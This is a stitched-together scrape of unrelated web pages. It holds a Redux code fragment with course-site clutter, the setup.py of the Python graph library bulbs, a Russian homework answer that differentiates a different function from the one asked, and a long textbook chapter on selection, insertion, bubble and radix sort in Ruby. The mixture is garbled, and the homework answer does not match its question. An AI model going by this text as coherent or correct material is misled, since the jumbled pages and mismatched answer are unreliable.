A simple example will be to evaluate the complexity of computing a2+ab+b2 for a large number, say, n, of pairs of a and b. Computing directly, we should have 3n multiplications and 2n additions. However, we can compute the same expression using (a + b)2ab, which can be done in 2n multiplications and 2n additions (note that we consider addition and subtraction to be in the same family of steps). Thus, the second expression is better than the original. For very large values of n, this may make a significant difference in computation time. This is a very simple example, but it provides a background for our discussions of the complexity of sorting algorithms.
In complexity analysis, we forgo constants; thus, the distinctions between n and n – 1 in terms of complexity are nonexistent. More so, we often assume that all computations are of the same family of operations. In terms of our complexity analysis, it does not matter whether the list shrinks or grows; for simplicity, assume it shrinks.
Now consider the three presented comparison-based sorting algorithms. For all, the outer loop has n steps, and for the inner loop the size of the list shrinks by one with each pass. So the first time it takes n steps, the next time n – 1, the next time n – 2, and so on. Thus, the number of steps is:
n + (n – 1) + (n – 2) + ... + 3 + 2 = 2 + 3 + ... + (n – 2) + (n – 1) + n
If you add 1 to the rewriting of the sum, it becomes a well-known arithmetic series, and its total is . So the total number of steps for these sorts is .
Clearly, for any n > 0, is less than n2; however, the complexity is still considered roughly n2. The official notation is and is pronounced “on the order of” or “big oh.” The reason the complexity is is because complexity is only an approximation, and clearly the dominant portion of is n2. For our purposes, if you grasp the concept of the dominant portion to determine complexity, you are ahead of the game.
For the complexity analogies, cn2, where c is a constant, is considered for any finite c. For actual computations, however, the value of c may be important. Again, refer to a book on complexity theory to understand, in detail, this important concept. For a reading list on algorithms and complexity, see Appendix A.
As an aside, order computation typically involves best-, average-, and worst-case analyses. For the selection and bubble sort algorithms presented, the best-, average-, and worst-case analyses are the same, since regardless of the initial ordering of the list, the processing is identical. As previously mentioned, there is an implementation of bubble sort that checks for no swapping with potential early termination. In such a case, the best-case analysis, which occurs when the initial list is already sorted, is .
Now let’s turn to insertion sort, which is somewhat trickier to analyze. Here we are finding the rightmost element at which point to insert the value. For an already sorted list, the rightmost element will occur immediately, and we will end up at only n steps! Thus, the best-case analysis for insertion sort is . However, if the list is precisely the opposite of sorted, namely, in descending order, we must process until the end of the list for each step. Thus, once again, we end up with steps. Thus, the worst-case analysis for insertion sort is . It turns out that the average-case analysis is likewise .
The radix sort works in , where d is the number of digits that must be processed and n is the number of entries that are to be sorted. Hence, it should run much faster than the other examples. It should be noted that other algorithms—quicksort, mergesort, and heapsort—all run in time. The radix sort might at first appear to be faster than these, but it depends on how many digits are processed. A 64-bit integer might require processing each bit as a digit. Hence, the runtime where d = 64 will be . This might sound good, but n log(n) time will be faster where n < 264. So, in comparing the three sorts as presented, the average- and worst-case analyses for each on the comparison-based sorts is , while the radix sort can vary from linear time (sorting values with a single bit) to an infinite amount of time, as the number of digits is theoretically not constrained.
7.3 Searching
Searching a list of names or numbers is another very common computer science task. There are many search algorithms, but the key in developing a search algorithm is to determine which type of candidate search process matches the particular need. The following are the two questions (parameters) that affect our search algorithm selection:
§ Is the list we are searching sorted or unsorted?
§ Are the searched list elements unique, or are there duplicate values within the list?
For simplicity, we illustrate the search process using only a unique element list. That is, our implementation assumes that there are no duplicate values. We then discuss what needs to be modified in the algorithm and corresponding Ruby implementation to support duplicate values. Given the level of programming sophistication you now possess, we forgo presenting the only slightly modified implementation that supports duplicate values and leave it as an exercise for you. Once again, we revisit the final exam grade example we used in the sections on sorting.
We now discuss two types of searches. The first is for an unsorted list called a linear search, and the second is for an ordered or sorted list; it is called a binary search.
7.3.1 Linear Search
Consider the problem of finding a number or a name, or more accurately, its position, in an unsorted list of unique elements. The simplest means to accomplish this is to visit each element in the list and check whether the element in the list matches the sought-after value. This is called a linear or sequential search since, in the worst case, the entire list must be searched in a linear fashion (one item after another). This occurs when the sought-after value either is in the last position or is absent from the list. Obviously, the average case requires searching half the list since the sought-after value can be found equally likely anywhere in the list, and the best case occurs when the sought-after value is the first element in the list. The algorithm is as follows:
1. For every element in the list, check whether the element is equal to the value to be found.
2. If the element looked for is found, then the position where the element is found is returned. Otherwise, continue to the next element in the list.
Continue the search until either the element looked for is found or the end of the list is reached.
A Ruby implementation for unique element linear search is provided in Example 7-5.
Example 7-5. Code for linear search
1 # Code for linear search
2 NUM_STUDENTS = 35
3 MAX_GRADE = 100
4 arr = Array.new(NUM_STUDENTS)
5 value_to_find = 8
6 i = 1
7 found = false
8
9 # Randomly put some student grades into arr
10 for i in (0..NUM_STUDENTS - 1)
11 arr[i] = rand(MAX_GRADE + 1)
12 end
13
14 puts "Input List:"
15 for i in (0..NUM_STUDENTS - 1)
16 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
17 end
18 i = 0
19 # Loop over the list until it ends or we have found our value
20 while ((i < NUM_STUDENTS) and (notfound))
21 # We found it :)
22 if (arr[i] == value_to_find)
23 puts "Found " + value_to_find.to_s + " at position " + i.to_s + " of
the list."
24 found = true
25 end
26 i = i + 1
27 end
28
29 # If we haven't found the value at this point, it doesn't exist in our list
30 if (notfound)
31 puts "There is no " + value_to_find.to_s + " in the list."
32 end
Consider now the case of an unsorted list with potentially duplicate elements. In this case, it is necessary to check each and every element in the list, since an element matching the sought-after value does not imply completion of the search process. Thus, the only difference between this algorithm and the unique element linear search algorithm is that we continue through the entire list without terminating the loop if a matching element is found.
§ In line 5, we initialize the sought-after value. Clearly the user would be prompted with some nice box to fill in, but we do not want to get distracted with user-interface issues. Ultimately the user fills in the nice box, pulls down a value list, or clicks on a radio button, and a variable such as value_to_find will be initialized.
§ Next, a flag called found is set to false on line 7. This is used so that the search will terminate when the sought-after value is indeed found.
§ In lines 10–12, the list is initialized and filled with some random values.
§ The key loop starts at line 20, where the list is traversed one item at a time. Each time, the comparison in line 22 tests to determine if the element in the array matches the sought-after value the user is trying to find. If the value matches, a message is displayed, the flag is set to true, and the loop terminates.
§ Finally, on line 30, a check is made to determine if the element was not found—in other words, is absent from the list. If this is the case, the value in the found flag will remain false. If it is still false after traversing the entire list, this means that no value in the list matched the sought-after value, and the user is notified.
7.3.2 Binary Search
Binary search operates on an ordered set of numbers. The idea is to search the list precisely how you might automatically perfectly search a phone book. A phone book is ordered from A to Z. Ideally, you initially search the halfway point in the phone book. For example, if the phone book had 99 names, ideally you would initially look at name number 50. Let’s say it starts with an M, since M is the 13th letter in the alphabet. If the name we are looking for starts with anything from A to M, for example, “Fred,” we find the halfway point between those beginning with A and those beginning with M. If, on the other hand, we are searching for a name farther down the alphabet than those names that start with M, for example, “Sam,” we find the halfway point between those beginning with M and those beginning with Z. Each time, we find the precise middle element of those elements left to be searched and repeat the process. We terminate the process once the sought-after value is found or when the remaining list of elements to search consists of only one value.
By following this process, each time we compare, we reduce half of the search space. This halving process results in a tremendous savings in terms of the number of comparisons made. A linear search must compare each element in the list; a binary search reduces the search space in half each time. Thus, 2x = n is the equation needed to determine how many comparisons (x) are needed to find a sought-after value in an n element list. Solving for x, we obtain x = log2(n).
GEM OF WISDOM
Binary search is one of the finest examples of computer science helping to make software work smart instead of just working hard. A linear search of 1 million elements takes on average half a million comparisons. A binary search takes 20. That is an average savings of 499,980 comparisons! So think before you code.
Instead of an algorithm needed to find an element using a linear search, we now have an search algorithm. Now, for example, consider a sorted list with 1,048,576 elements. For a linear search, on average, we would need to compare 524,288 elements against the sought-after value, but we may need to perform a total of 1,048,576 comparisons.
In contrast, in a binary search we are guaranteed to search using only log2(1,048,576) = 20 comparisons. Instead of 524,288 comparisons in the average case, the binary search algorithm requires only 20. That is, the number of comparisons required by the binary search algorithm is less than 0.004% of the expected number of comparisons needed by the linear search algorithm. As an aside, and are equivalent, since they differ strictly by a constant. Hence, generally speaking, the notation is preferred. Of course, binary search is possible only if the original list is sorted. The binary search explanation given earlier is for a unique element list only. However, before presenting the modification needed for potential duplicate elements, a few remarks regarding the use of binary search must be made:
§ First, binary search assumes an ordered list. If the list is unordered, it must be sorted prior to the search, or a binary search won’t work. Sorting involves a greater time complexity than searching. Thus, if the search will occur rarely, it might not be wise to sort the list. On the other hand, searches often occur frequently and the updating of the list occurs infrequently. Thus, in such cases, always sort (order) the list and then use binary search.
§ The average- and worst-case search times for binary search are , while the average- and worst-case search times for linear search are . What is interesting, however, is that unlike for linear search, where, in practice, the worst-case search time is double that of the average case, for binary search both times are roughly identical in practice.
In Example 7-6, we present a Ruby implementation of unique element binary search. Note that we introduce on line 16 a built-in Ruby feature to check if a value is already present within an array and on line 22 to sort an array in place.
Example 7-6. Code for binary search
1 # Code for binary search
2 NUM_STUDENTS = 30
3 MAX_GRADE = 100
4 arr = Array.new(NUM_STUDENTS)
5 # The value we are looking for
6 value_to_find = 7
7 low = 0
8 high = NUM_STUDENTS - 1
9 middle = (low + high) / 2
10 found = false
11
12 # Randomly put some exam grades into the array
13 for i in (0..NUM_STUDENTS - 1)
14 new_value = rand(MAX_GRADE + 1)
15 # make sure the new value is unique
16 while (arr.include?(new_value))
17 new_value = rand(MAX_GRADE + 1)
18 end
19 arr[i] = new_value
20 end
21 # Sort the array (with Ruby's built-in sort)
22 arr.sort!
23
24 print "Input List: "
25 for i in (0..NUM_STUDENTS - 1)
26 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
27 end
28
29 while ((low <= high) and (notfound))
30 middle = (low + high) / 2
31 # We found it :)
32 if arr[middle] == value_to_find
33 puts "Found grade " + value_to_find.to_s + "% at position " + middle.to_s
34 found = true
35 end
36
37 # If the value should be lower than middle, search the lower half,
38 # otherwise, search the upper half
39 if (arr[middle] < value_to_find)
40 low = middle + 1
41 else
42 high = middle - 1
43 end
44 end
45
46 if (notfound)
47 puts "There is no grade of " + value_to_find.to_s + "% in the list."
48 end
We use these features to simplify the code illustrated. Note that this type of abstraction, namely, the use of the built-in encapsulated feature, simplifies software development, increases readability, and simplifies software maintenance. Its use is paramount in practice. It should be understood that this book uses Ruby as a tool for learning concepts of computer science and basic programming, and not as an attempt to teach all the capabilities of the Ruby interpreter. See the additional reading list in Appendix A if you are interested in exploring additional built-in features of Ruby.
§ Line 9 computes the first middle range.
§ Lines 29–44 implement the key loop that keeps cutting the search space down by half.
§ Line 32 is the comparison to the sought-after value. If we find the element, we are done and we update the same found flag that was used for the linear search. If the value is less than the middle we update the high side of the range, and if it is greater we update the low side of the range. At the end, we verify that the sought-after value was indeed found.
As with the linear search algorithm, the modification required to support possible duplicate values is relatively minimal for the binary search algorithm. Since binary search requires an ordered list, if a sought-after value is found, then all duplicates must be adjacent to the position just found.
Thus, to find all duplicates, positions immediately preceding and following the current position are checked for as long as the sought-after value is found. That is, in succession, adjacent positions earlier and earlier in the list are checked while the stored element value equals that which is sought after, and similarly for later and later positions. Again, the implementation of this change is left as an exercise to the reader.
7.4 Summary
We discussed the various sorting schemes, both comparison-based and non-comparison-based, and the strengths of each. We introduced the field of complexity analysis, a tool used to quantify the performance of an algorithm. Finally, we discussed searching and provided a real-world example of searching techniques.
Specifically, we described four elementary sorting algorithms. The first three presented—selection, insertion, and bubble sort—are comparison based. That is, elements are compared against one another to determine a sorted ordering. The fourth algorithm, radix sort, differs substantially. Instead of comparing elements, radix sort orders the elements according to their representation, starting from the rightmost digit. Once all digits of the element representation are processed, the list is sorted. The complexity of these sorting algorithms is presented in Table 7-1, where n represents the number of elements in the list and k represents the number of digits needed to represent the largest element. The best-case scenario occurs when the original list is already sorted; the worst-case scenario occurs when the original list is in reserve order; and the average-case scenario represents an original random ordering.
Table 7-1. Sort algorithm complexity summary
Best case
Worst case
Average case
Selection sort
Insertion sort
Bubble sort
Radix sort
Likewise, we presented two searching algorithms: linear and binary search. Linear search can be used to search any list, whereas binary search requires a sorted list. The complexity of these searching algorithms is presented in Table 7-2, where n represents the number of elements in the list searched. The best-case scenario occurs when the first element encountered is the element sought; the worst-case scenario occurs when the sought after element is missing; and the average-case scenario represents a random list.
Table 7-2. Search algorithm complexity summary
Best case
Worst case
Average case
Linear search
Binary search
7.4.1 Key Concepts
§ Sorting is a common problem that occurs in many places in computer science. We focus primarily on comparison-based sorting, where we simply compare the items to determine the order. Radix sort sorts numbers without directly comparing them.
§ Searching can be done naively by linearly searching through a list, but if the list is sorted, we can take advantage of binary search to improve performance.
§ When discussing algorithm performance, computer scientists use complexity analysis.
7.4.2 Key Definitions
§ Comparison-based sort: A sorting method that relies on directly comparing the elements.
§ Complexity analysis: A mathematical way of analyzing an algorithm’s performance.
7.5 Exercises
1. Radix sort, as presented, works for integers. Modify the algorithm in Example 7-4 to sort English names.
2. For each input sequence provided in the following list, state which presented comparison-based sort or sorts would require the fewest steps. Explain why.
a. 5 2 4 3 1
b. 1 2 3 4 5
c. 5 4 3 2 1
3. You are provided a lengthy unsorted list and told to search it.
a. Which search algorithm would you use?
b. If you were told that you will need to search the list many times, would your search strategy change? If so, how?
c. At which point would you change your approach if you were to change it?
4. The complexity of the comparison-based sorting algorithms presented, on the average case, is . Design a comparison-based sorting algorithm with a lower complexity. What is the underlying premise that lowers its complexity?
5. Generate a 100-element list containing integers in the range 0–10. Sort the list with selection sort and with radix sort.
a. Which is faster? Why?
b. Try this again, but with 10,000 elements. Note the relative difference. Why does it exist?
|
__label__pos
| 0.99724 |
10 unstable releases (3 breaking)
0.4.5 Feb 20, 2023
0.4.4 Feb 3, 2023
0.3.0 Feb 1, 2023
0.2.1 Feb 1, 2023
0.1.0 Feb 1, 2023
#929 in Embedded development
47 downloads per month
MIT license
29KB
314 lines
ina3221
crates.io
Embedded driver for the INA3221 triple-channel power monitor in Rust.
The INA3221 is very similar to the classic INA219 power monitor IC.
Compatibility
Any board that supports embedded-hal blocking 1.0 I2c should be compatible with this library.
NOTE: Some HALs require feature flagging to enable 1.0 functionality, for example esp-hal requires the eh1 feature.
Installation
You can add via crates.io:
$ cargo add ina3221
NOTE: Some HALs require feature flagging to enable 1.0 functionality, for example esp-hal requires the eh1 feature.
Documentation
You can find the documentation here.
Example
This example assumes a 0.1 Ohm shunt resistor for current and power calculations.
const INA3221_I2C_ADDR: u8 = 0x40;
const SHUNT_RESISTANCE: f32 = 0.1f32; // 0.1 Ohm
use ina3221::INA3221;
fn main() {
let i2c = I2C::new(/* initialize your I2C here */);
let ina = INA3221::new(i2c, INA3221_I2C_ADDR);
let mut delay = Delay::new(/* initialize your delay/clocks */);
loop {
for channel in 0..3 {
let shunt_voltage = ina.get_shunt_voltage(channel).unwrap();
let bus_voltage = ina.get_bus_voltage(channel).unwrap();
// Voltage can be added using the '+' operator on the unit type
let load_voltage = bus_voltage + shunt_voltage;
// Skip channel if no voltage present
if shunt_voltage.is_zero() {
continue;
}
// Use Ohm's Law to calculate current and power with known resistance
let current_milliamps = shunt_voltage.milli_volts() / SHUNT_RESISTANCE;
let power_milliwatts = current_milliamps * load_voltage.volts();
println!(
"Channel {}: load = {:.3} V, current = {:.3} mA, power = {:.3} mW",
channel_index + 1,
load_voltage.volts(),
current_milliamps,
power_milliwatts,
);
}
delay.delay_ms(1000u32);
}
}
Output
This is sample output powering an Arduino Uno R3 over USB, running the blinky script.
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.211 V, current = 33.600 mA, power = 175.102 mW
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.219 V, current = 34.000 mA, power = 177.460 mW
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Channel 1: load = 5.212 V, current = 36.400 mA, power = 189.704 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Channel 1: load = 5.212 V, current = 36.800 mA, power = 191.790 mW
Channel 1: load = 5.211 V, current = 34.000 mA, power = 177.188 mW
Dependencies
~215KB
|
__label__pos
| 0.993295 |
What Is the Main Purpose of Bitcoin?
Lately I took a peek at why does bitcoin mining utilize a lot of electricity? It’s due to the amount of computers which are engaging in the community. The more computers you will find, the rate of the system increases. This usually means that the more work that has to be done in order to guarantee the system and guard against things like denial of service attacks.
What Sort of Job Must Enter Securing the Community?
So what sort of job must enter securing the community? There are two big components to consider here. The first element is that the castrate. The more complicated the castrate, the more work must enter securing the system since the fewer servers will take the task from the individual performing the procuring. Due to this, the folks having the most hashrate will probably be taking good care of their safety.
What Sort of Job Must Enter Securing the Community?
One more factor to consider here is your memory speed. This is essential since your trade data are not going to need to travel across many distinct computers before it is listed. The more memory that the computer has, the faster the information can be saved and moved. Consequently, when you’ve got a large hashrate but very low memory, then you are going to be consuming much less energy than you’d using a decrease castrate and a top memory.
Why Can Bitcoin Mining Utilize a Lot of Electricity?
These are two big factors when considering why can bitcoin mining utilize a lot of electricity? 1 rationale is that in order for you to earn money from mining, then you have to get a lot of computing power. At this time, there are not very many computers out there that have a large enough hashrate to generate money. As a result, unless there’s a solution that may increase the castrate satisfactorily, you are not likely to have the ability to earn any money from this kind of company until the technology is present. Even then, it will not be anytime soon.
Another reason this occurs is because power is normally a rare resource. The dilemma is there is a limited quantity of power available for people to utilize. Solar electricity and wind power are great examples of other sources of electricity which are economical to use and reliable. They enable us to create our own power using the energy we have available.
To sum this up, the largest reason does bitcoin evolution review mining utilize a lot of electricity is because there aren’t any large scale options set up yet to decrease the castrate necessary to conduct a complete node. We might eventually see this type of solution but for the time being, we’re restricted by the present hashrate we could utilize. To raise castrate, we’d need to proceed to a bigger computer which has multiple hard drives or purchase more RAM. These are just a few reason why the castrate constraints exist and they won’t change in the not too distant future.
Comments |0|
Legend *) Required fields are marked
**) You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Category: Blog
|
__label__pos
| 0.968914 |
Monthly Archives: June 2011
How can I be a KDE power user?
As far as I can tell, KDE is essentially a desktop environment shell layered on top of many very useful libraries. The difficulty is, how does one test each individual layer?
Here’s a recent example. I started by using Amarok as my music player, a default choice it seems for many KDE users. I put an audio CD in the drive, and it appeared in Amarok. When I tried to play or rip the CD, though, the interface just wouldn’t respond.
Fast-forward many, many hours later, and I’ve traced the issue through logs spit out by Amarok, Phonon, Kscd, gstreamer, ffmpeg, and the kernel itself, and I narrow the issue down to KDE I/O layer. cdparanoia reads disks just fine. No KDE-based app can. There’s a lot of seek errors in the kernel logs, which appear only when a KDE-based app is up and running with a CD in the drive.
So what’s the big deal, you might ask? I figured it out. What’s the problem?
Perhaps I’m spoiled, but in GNOME I debugged issues quite differently. If I had an issue, I’d go through each API layer, and use each one’s executables. Note the difference between KDE and GNOME: GNOME makes every layer, every setting easy to access, if you look for it. KDE gives you everything at once, and hides everything else in a wall of libraries. There’s no intermediate executables I can use to debug each layer, by manually running through steps myself. There’s no ability to get a work-around, or to helpfully narrow down the area where the bug exists for Google searching.
How do I make my debugging with KDE more productive? What steps do I take? How have you debugged KDE-based applications? I know about the KDE wiki page, but is there anything else?
Follow
Get every new post delivered to your Inbox.
|
__label__pos
| 0.963015 |
UVa 1339 Ancient Cipher
浏览: 161 发布日期: 2017-12-24 分类: c
Ancient Cipher
Time Limit: Unknown Memory Limit: Unknown
Total Submission(s): Unknown Accepted Submission(s): Unknown
https://uva.onlinejudge.org/i...
Accepted Code
#include "stdio.h"
#include "string.h"
#define MAX 110
void count(char str[], int cnt[]);
int main()
{
char str1[MAX], str2[MAX];
while (scanf("%s%s", str1, str2) != EOF)
{
int cnt1[26] = { 0 }, cnt2[26] = { 0 };
count(str1, cnt1); count(str2, cnt2);
for (int i = 1; i < 26; i++) {
for (int k = 0; k < 26 - 1; k++) {
if (cnt1[k] > cnt1[k + 1]) {
int tmp = cnt1[k];
cnt1[k] = cnt1[k + 1];
cnt1[k + 1] = tmp;
}
if (cnt2[k] > cnt2[k + 1]) {
int tmp = cnt2[k];
cnt2[k] = cnt2[k + 1];
cnt2[k + 1] = tmp;
}
}
}
int flag = 1;
for (int i = 1; i < 26; i++) {
if (cnt1[i] != cnt2[i]) {
flag = 0;
break;
}
}
if (flag)
printf("YES\n");
else
printf("NO\n");
}
return 0;
}
void count(char str[], int cnt[])
{
for (int i = 0; str[i] != '\0'; i++)
cnt[str[i] - 'A']++;
}
Notes
题意:
给定两条字符串,可以对其中一条进行操作“重排字母顺序”和“一一映射”(当然也可以不操作),问操作后两串能否相同。
分析:
既然字母可以重排,则每个字母的位置并不重要,重要的是每个字母出现的次数。
这样可以先统计出两个字符串中各个字母的出现次数,得到两个数组cnt1[26]和cnt2[26]。
下一步需要一点想象力:只要两个数组排序之后的结果相同,输入的两个串就可以通过重排和一一映射变得相同。
这样,问题的核心就是排序。
//-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
//
// 作者:龙威昊
// 完成时间:2017/12/22
//
//-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
返回顶部
|
__label__pos
| 0.995052 |
What Is Linear Regression?
Linear regression is a method to predict the value of an outcome variable (Y) depending on one or more input predictor variables (X). The objective of linear regression is to model a continuous variable (Y) as a mathematical function of one or more variable(s) (X), in order to use this regression model to predict Y when only X is known.
This mathematical equation can be generalized as follows:
Y = β1 + β2X + ϵ
where, β1 is the intercept and β2 is the slope. Collectively, they are called regression coefficients. ϵ is the error term, the part of Y the regression model is unable to explain.
What Is Linear Regression? -magoosh
Simple Linear Regression
In Simple Linear Regression, there is only one predictor variable (X). The predictions of Y when plotted as a function of X form a straight line.
A Simple Example
Let us take a simple example to understand the concept of regression. Consider the following data –
X Y
1 4
3 5
4 3
2 2
5 5
If we plot the above data, we get the following:
In Linear Regression, we try to find the best-fitting straight line through the points. The best-fitting line is called a regression line.
In the above plot, the black line is the regression line. The most frequently used criterion for the best fitting line is the line which minimizes the sum of the squared errors of prediction. The error of prediction for a point is the value of the point minus the predicted value. The predicted value is simply the value on the regression line.
For example, for the point where x=3, y=5, the predicted value is 3.4, that is, the point on the line corresponding to x=3 is 3.4 but actually the y value is 5. So, the error of prediction is 1.6.
The regression line minimizes the root mean square error, that is, the root of sum of square of errors of prediction of all the points. The mean square error (MSE) is the mean of square of the errors of prediction of all the points. And the root mean square error (RMSE) is the root of MSE. In the above example, the MSE is 2.150 and RMSE is 1.466.
To compute the regression line, a few concepts of statistics are used. Let MX be the mean of X, MY be the mean of Y, sX be the standard deviation of X, sY be the standard deviation of Y, and r be the correlation between X and Y.
The slope of the regression line is calculated as –
b = r*(sY/sX)
And the intercept of the regression line is calculated as –
A = MY – b*(MX)
Nowadays there are many statistical software that help to compute the regression line.
Correlation
Correlation is a statistical measure that suggests the level of linear dependence between two variables. Correlation can take values between -1 to +1. A value of correlation closer to 1 or -1 suggests a strong relationship between the variables. Whereas the value of correlation closer to 0 indicates a weak relationship between the variables. A low correlation (-0.2 < x < 0.2) usually suggests that most of the variation of the response variable (Y) is not explained by the predictor (X).
Statistical Significance
We assess out linear regression model’s statistical significance by looking at p-value and t-value. Usually, we acknowledge a linear model to be statistically significant when these p-values are less than the pre-determined statistical significance level. This level is ideally 0.05.
When there is a p-value, there is a hull and alternative hypothesis related to it which helps to analyze the model. In linear regression, the null hypothesis is that the coefficients linked with the variables are equal to zero. The alternate hypothesis is that the coefficients linked with the variables are not equal to zero (i.e. there exists a relationship between the independent variable in question and the dependent variable).
A larger t-value implies that it is less likely that the coefficients are not equal to zero entirely by chance. So, higher the t-value, the better. Pr(>|t|) or p-value is the probability that you get a t-value as high or higher than the observed value when the Null Hypothesis (the β coefficient is equal to zero or that there is no relationship) is true. So, if the Pr(>|t|) is low, the coefficients are significant (significantly different from zero). If the Pr(>|t|) is high, the coefficients are not significant.
When p-value is less than the significance level (< 0.05), we can safely reject the null hypothesis that the coefficient β of the predictor is zero.
Real Life Example
Let us consider an example where we have data of class tenth and class twelfth marks data of 30 students. We want to check if there is any relation between the class tenth and class twelfth marks. The scatterplot of our data looks like:
Applying Linear regression, we get the plot as:
For the above regression model, the R² value is 0.631 which is closer to 1 that indicates that there is a moderate relationship between class tenth and class twelfth marks.
The values of MSE and RMSE are 84.132 and 9.172 respectively.
Applications of Linear Regression
Linear regression is a significantly important tool to anticipate the possible relationships between variables in various fields such as biological, social and behavioral sciences. It is one of the most important concepts used in these disciplines. Linear Regression is also used in Finance and economics. It is used to predict consumer spending, inventory investment, spending on imports and numerous other financial statistics. It is widely used in capital asset pricing model in finance. It is also used in trend line analysis, epidemiology etc.
The applications of linear regression is ever increasing as the data availability is increasing in every other field. With more data collection in various fields, the application of regression can be extended to any data to compute the significance of various variables.
Comments are closed.
Magoosh blog comment policy: To create the best experience for our readers, we will only approve comments that are relevant to the article, general enough to be helpful to other students, concise, and well-written! 😄 Due to the high volume of comments across all of our blogs, we cannot promise that all comments will receive responses from our instructors.
We highly encourage students to help each other out and respond to other students' comments if you can!
If you are a Premium Magoosh student and would like more personalized service from our instructors, you can use the Help tab on the Magoosh dashboard. Thanks!
|
__label__pos
| 0.943445 |
Music sign on keyboard mac
Either way, you can complete these tasks easily in a few simple steps. This article was co-authored by our trained team of editors and researchers who validated it for accuracy and comprehensiveness. Categories: Drawing Musical Symbols Symbols.
Turn Your Mac Keyboard Into a GarageBand Piano
Learn why people trust wikiHow. Co-authored by wikiHow Staff Updated: March 29, Learn more Method 1. Open your browser. You will be able to complete this task in any of the newer versions of Safari, Chrome, and Firefox. Go to your special symbols. Select your symbol.
Typing symbols in Windows 10
From the window that appears, you can search "Musical Symbols," "Musical Notes," "Notes," or any other variation in order to show the available options. Once you have found the note you would like to type, highlight it by clicking on it. Drag the symbol.
2 easy ways to find and add musical notes in MS Word
Once you have highlighted the symbol, drag it to where you would like to place it in your text. Method 2.
What's That Keyboard Character Called?
Open System Preferences. This can be done by selecting the Apple icon in the upper left-hand side of your screen or by clicking on the silver icon that resembles a cog from your task bar. Make sure "Show input menu in menu bar" is selected. These alt code Mac shortcuts will work on all default text editing apps like Pages , Numbers, Keynote, Notes, TextEdit or when typing emails. Here is the complete list of keyboard shortcuts for inserting symbols using option or alt key in macOS.
Use the search box to find or filter the results from the table. You can use one of the option keys on your keyboard to use the shortcuts. Similar to any other text content, you can increase or decrease the font size of the symbols and apply colors.
Garageband Keyboard
In our earlier article, we have explained how to type accented characters in Windows. You can use the below shortcut as a reference to insert accented characters in Mac.
1. Navigation menu?
2. microsoft virtual pc for mac 7 intel.
3. all my files mac empty;
4. Thanks for helping keep SourceForge clean..
5. Garageband Keyboard: corxacortija.ml.
6. how to install brother wireless printer without cd on mac.
7. brick o la mac lipstick swatch.
Alternatively, press and hold the special letter key to view the options similar to iPhone or iPad keyboard. In order to show the options for capital letters press and hold shift with the special key.
Apple logo on foreign platforms
Mac offers different keyboard input methods to type in a language different than your standard keyboard layout. You can change the input method to Unicode Hex Input and type keyboard characters and accented letters. Similar to Windows Character Map, Mac has a Character Viewer tool to insert emojis , symbols and special characters in any text content. Many users think alt code shortcuts are useful only on Windows operating system. Some keys repeat when you press and hold them, depending on where you type them.
• force quit keystrokes mac os x!
• How to use the Keyboard Viewer on your Mac.
• virtual machine for mac os x free.
• In apps where accented characters aren't used like Calculator, Grapher, or Terminal , letter and number keys also repeat when you press and hold them. Use emoji on your iPhone, iPad, and iPod touch. How to use emoji, accents, and symbols on your Mac macOS includes features that make it easy to find and type special characters like emoji and currency symbols.
Type emoji and other symbols Click the place in your document or message where you want the character to appear. Press Control—Command—Space bar.
|
__label__pos
| 0.590381 |
Beefy Boxes and Bandwidth Generously Provided by pair Networks
go ahead... be a heretic
PerlMonks
Re: Change package name on the fly?
by BrowserUk (Pope)
on Sep 05, 2012 at 23:20 UTC ( #991969=note: print w/ replies, xml ) Need Help??
in reply to Change package name on the fly?
You could try:
1. Slurp the source code of (one of) the packages.
2. Edit the package statement.
3. eval the edited source into existence.
Probably easier to just edit the name manually in the file until your testing is complete.
With the rise and rise of 'Social' network sites: 'Computers are making people easier to use everyday'
Examine what is said, not who speaks -- Silence betokens consent -- Love the truth but pardon error.
"Science is about questioning the status quo. Questioning authority".
In the absence of evidence, opinion is indistinguishable from prejudice.
RIP Neil Armstrong
Comment on Re: Change package name on the fly?
Log In?
Username:
Password:
What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://991969]
help
Chatterbox?
and the web crawler heard nothing...
How do I use this? | Other CB clients
Other Users?
Others browsing the Monastery: (9)
As of 2015-01-29 23:32 GMT
Sections?
Information?
Find Nodes?
Leftovers?
Voting Booth?
My top resolution in 2015 is:
Results (244 votes), past polls
|
__label__pos
| 0.871112 |
Is powerline Ethernet slower?
Is powerline Ethernet slower?
Powerline Ethernet, also known as Powerline Networking or PLC (Power Line Communication), is a technology that uses the existing electrical wiring in a building to transmit network data signals. It is a popular alternative to traditional Ethernet cables or wireless networks as it offers the convenience of using electrical outlets for networking purposes.
One common concern among users considering powerline Ethernet is its potential impact on network speed. In this article, we will explore whether powerline Ethernet is slower compared to other networking methods.
How Powerline Ethernet Works
Before diving into the speed aspect, it is essential to understand how powerline Ethernet works. Powerline Ethernet adapters typically come in pairs – one adapter connects to your router via an Ethernet cable, while the other adapter plugs into an electrical outlet in another part of your home or office.
Once connected, the adapters communicate with each other using electrical signals that traverse the existing electrical wiring. This allows the transmission of data signals between the two adapters, effectively extending the network connection to the desired location.
Factors Affecting Powerline Ethernet Speed
Several factors can impact the speed of a powerline Ethernet network. It is essential to consider these factors when evaluating the performance and speed capabilities of this networking solution.
Electrical Wiring Quality:
The quality, age, and condition of your electrical wiring can affect the performance of powerline Ethernet. Older or poorly maintained electrical wiring may introduce interference, reducing the speed and reliability of the network connection. On the other hand, newer and well-maintained wiring can provide better performance.
Distance and Electrical Circuits:
Powerline Ethernet performance may vary depending on the distance between the adapters and the complexity of electrical circuits. The signal strength tends to weaken over longer distances and may suffer additional degradation when passing through circuit breakers or surge protectors.
Interference:
Is powerline Ethernet slower?
